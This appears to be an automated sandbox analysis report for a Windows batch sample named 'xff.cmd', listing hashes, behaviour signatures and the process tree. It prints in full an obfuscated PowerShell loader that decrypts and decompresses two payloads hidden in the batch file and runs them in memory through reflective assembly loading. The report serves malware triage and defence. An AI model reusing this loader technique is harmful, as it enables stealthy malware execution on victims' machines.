Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
03-06-2024 11:15
Static task
static1
Behavioral task
behavioral1
Sample
xff.cmd
Resource
win7-20240419-en
windows7-x64
4 signatures
150 seconds
General
-
Target
xff.cmd
-
Size
55KB
-
MD5
23c88462d32d9ea10a2e1d8dc2c0761d
-
SHA1
c4b3e713eeb23905db0919ad42eca4c4e04594ba
-
SHA256
726b4c7268e3ac98dafe554aa3cf05e6ed6a185890ff717702b2e5c606cc64c1
-
SHA512
cbb8dcec750ec00737c47d5352f13843831dcda49a0bd8c83cad986b47e6353a7d242257e7e08278c153902bec499688d8e89d2f5c73f1d90812234066545f0f
-
SSDEEP
768:cgYYV4VeUd8SqTSn40DSEg5+VmcA1T++1/WQItIoQMrGvNAoaN/:cgkRqTaRSTNTCCdvNAoaN/
Score
3/10
Malware Config
Signatures
-
pid Process 2240 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2240 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2240 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2204 wrote to memory of 2240 2204 cmd.exe 29 PID 2204 wrote to memory of 2240 2204 cmd.exe 29 PID 2204 wrote to memory of 2240 2204 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\xff.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:2204 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Yfl+9e1ujQfBCdBEV6Z2UkstrL+He9SOiaTy/tj4l0c='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7w7wzie8OzwYCnqdovjf0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $mCQBR=New-Object System.IO.MemoryStream(,$param_var); $vHGEF=New-Object System.IO.MemoryStream; $UfEkZ=New-Object System.IO.Compression.GZipStream($mCQBR, [IO.Compression.CompressionMode]::Decompress); $UfEkZ.CopyTo($vHGEF); $UfEkZ.Dispose(); $mCQBR.Dispose(); $vHGEF.Dispose(); $vHGEF.ToArray();}function execute_function($param_var,$param2_var){ $cUdZW=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $FjmYk=$cUdZW.EntryPoint; $FjmYk.Invoke($null, $param2_var);}$eNFll = 'C:\Users\Admin\AppData\Local\Temp\xff.cmd';$host.UI.RawUI.WindowTitle = $eNFll;$xVjlb=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eNFll).Split([Environment]::NewLine);foreach ($VLbEL in $xVjlb) { if ($VLbEL.StartsWith(':: ')) { $hpycz=$VLbEL.Substring(3); break; }}$payloads_var=[string[]]$hpycz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2240
-